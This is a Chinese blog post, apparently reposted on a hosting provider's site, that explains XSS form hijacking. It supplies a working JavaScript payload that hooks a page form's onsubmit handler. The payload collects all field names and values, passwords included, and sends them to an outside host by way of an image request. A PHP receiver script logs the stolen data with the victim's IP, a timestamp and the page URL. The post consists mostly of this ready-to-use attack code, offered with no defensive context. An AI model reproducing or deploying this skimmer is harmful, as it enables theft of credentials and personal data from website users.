温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

xss 表单劫持(from通用明文记录)

发布时间:2020-07-24 12:39:25 来源:网络 阅读:3644 作者:jzking121 栏目:网络安全

大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.


xss.js:

var f=document.forms['from1'];
if(f==undefined)
{
        f=document.getElementById('');
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
	var str='';
	for(var i=0;i<f.elements.length;i++)
	{
		str+=f.elements[i].name+':'+f.elements[i].value+'||';
	}
	str=str.substr(0,str.length-2);
	var img=new Image();
	img.src='https://blog.51cto.com/xss.php?data='+escape(str)+'&url='+escape(location.href);
	func(event);
	return true;
}

xss 表单劫持(from通用明文记录)


根据各程序不同,修改表单名称

var f=document.forms['form1'];



接收端xss.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['data'];
$url = $_GET['url'];
$time = gmdate("H:i:s",time()+8*3600);
$file = "jzking121.txt" ;
$fp=fopen ("jzking121.txt","a")  ;
$txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n";
fputs($fp,$txt);
?>



参考:

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI